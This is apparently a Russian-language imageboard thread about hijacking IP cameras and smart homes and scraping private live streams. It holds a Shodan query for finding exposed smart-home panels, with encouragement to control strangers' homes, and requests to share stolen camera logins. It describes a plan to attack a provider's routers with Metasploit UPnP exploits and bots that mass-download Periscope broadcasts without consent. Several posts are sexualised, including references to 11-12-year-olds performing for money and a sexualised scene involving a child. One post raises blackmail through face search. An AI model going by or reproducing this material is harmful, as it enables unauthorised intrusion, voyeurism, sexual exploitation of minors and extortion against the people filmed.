Камер с дефолтным паролем выпускается все меньше.
Бруты нужны уже под каждую конкретную уязвимость или модель.
Процесс поиска дыр в твоей мамаше куда интереснее реверса прошивок.
Можете ли вы разместить больше таких видео?
это действительно sesxy смотреть, как мама занимается сексом перед ее маленьким сыном )
uejzadX
Дианон лигивон!!!1
Периодически. Вот сейчас не работает.
а чьй?
Нашел опенсорсный скриптик с лыcнером который мониторит в прямом эфире твоих подписчиков, прямые эфиры, реплеи и скачивает их соответственно. Изменил его немного под себя.
Экспериментальным путем стало понятно, что качать в первую очередь нужно только прямые трансляции так как реплеи с годнотой быстро удаляют.
Так как сидеть весь день в перескопе ожидая появление годноты не представляется возможным, быстро набросал бота-подписчика на питоне.
Пробовал вначале бота для liveomg, но остановился на боте для pscp.tv
Он кароче постоянно ищет на этом сайте определенные слова, находит новые прямые трансляции с этими словами и подписывается на эти каналы если ещё не подписан.
Ну а первый скрипт соответственно, качает эти прямые трансляции и реплеи, если последние остаются за последние 12 часов.
Запустил все это на сервере и забыл. Я конечно ожидал что это будет хит но такого количества бабищ лёгкого поведения никак не ожидал.
Куда катится россиюшка? 11-12 летние готовые за 100 рублей показать все что возможно.
Одинокие бухие похотливые милфы светящие всеми частями тела, компании бухих тпшек светящие сиськами просто ради прикола.
Ни в одной стране мира нету такого количества одиноких пьяных похотливых бабищ лёгкого поведения в таком количестве, и ведущих прямые трансляции.
Стыдно господа.
пили фак, как получать годноту.
Ну вот, теперь на всех можно копить компромат с searchface.
Можно шантажировать и требовать денег или нуд, но я конечно же этого делать не буду.
Пошла массовка..
лавочку прикрыли, ссылки на вк убрали.
ктонибудь знает как найти id вк по ссылке на фото userapi.com?
там должен быть какойто способ через API VK.
хотя кому я это пишу, тред уже не втренде
К сожалению, нет.
Аниош, запили фак плиз. Ну или хотя бы расскажи, как парсить видосы и трансы с перископа.
Кто и нахуя ставит камеры у себя в комнате блядь?
>перескоп
слушай анонче, а ты не знаешь случаем, есть ли сейчас рабочие проги, чтоб в перескопопараше зрителей накручивать можно было?
Набегов на умные дома тред.
Анон, ты играл когда-нибудь в "Как достать соседа"? Теперь у тебя есть возможность поиграть в это ирл, а заодно показать, что лучше лишний раз поднять жопу, чем потом жалеть о потраченных деньгах, валяясь на диване.
Итак, ты готов коммунист доморощенный? Нам потребуется браузер и аккаунт на шодане.
Что ты будешь делать? Вставь в поисковую строку шодана вот эти буковки и циферки "http.favicon.hash:1903390397 200", а затем можешь как угодно фильтровать и искать умные дома по всему миру. Первая неприрывная надпись ищет как раз те самые умные дома, а цифра 200 фильтрует их по открытости.
Заходи на сайтики, выключай свет, включай тёплые полы и телек, или делай это наоборот. Весь дом в твоих руках, анон
>>10571
как
Поделитесь, пожалуйста кто-то своими "Logins" и "Passwords".
Так и должно быть? Типа она разлагает?
иди нахуйЯ спросил канал(чат) в телеге где все делятся, без определенных запросов на обмен и коммерцию...
ну так и проебывается сразу всё. Один на один обмен.
НЕТ НЕ ОНО
Поделись годными камерами, плз.
выкладывают обычные камеры, но там есть еще и какая-то закрытая группа, которая стоит денег.
если кто-то желает, может проверить.
1280x720, 0:20
In
А хули ты думал
В общем списке она появляется как надо, но в списке для проигрывания нету
Что можно сделать с этим?
Неактивные камеры удалил, которые добавлял до этого работают, клиент использую IVMS 4200 на компе
Теперь вопрос, могу ли я на первом этаже (напомню видеорегистратор на втором) просто врубить еще одну IP камеру в интернет розетку, а на втором из пустой розетки влепить витую пару в коммутатор, и поискать в видеорегистраторе новую камеру или надо вести провод прям от камеры до коммутатора на втором?
>Сразу скажу, я от темы камплюктеров далек.
Нанимай сисадмина. Из твоего текста топология сети непонятна.
ухх
нормально все заработало только через осла, через лису никак
Впринципе в подсети провайдера есть ещё целая куча вкусностей помимо камер, нашёл несколько открытых ftp сервер, открытых ssh со стандартными паролями и веб-интерфейсами Wifi роутеров, потом планирую пройти Metasploit-ом с плагином для пентеста UPnP, так как практически у каждого роутера из всех 1456 штук присутствует сабж первой версии и на него есть эксплоит
Есть какие-то альтернативы хикки? Чет с ней очень странно всё - сначала норм идет, а потом стаггер какой-то и всё очень долго.
как же сексуально он ее тискает. а еще тянка руку его направила типо вот тут трогай
ебать сучка жирножопая выебал бы этим пылесосом ее
охуенная камера. очень полезная
не подключена нет ни видео регистратора
ни облака
ни встроенной карты
только корообки в реал тайме.....
https://www.ozon.ru/product/ip-kamera-videonablyudeniya-wifi-besder-p3s-8-mp-ptz-kamera-s-dvumya-ekranami-6mm-12mm-zoom-890375505/
такая пойдет?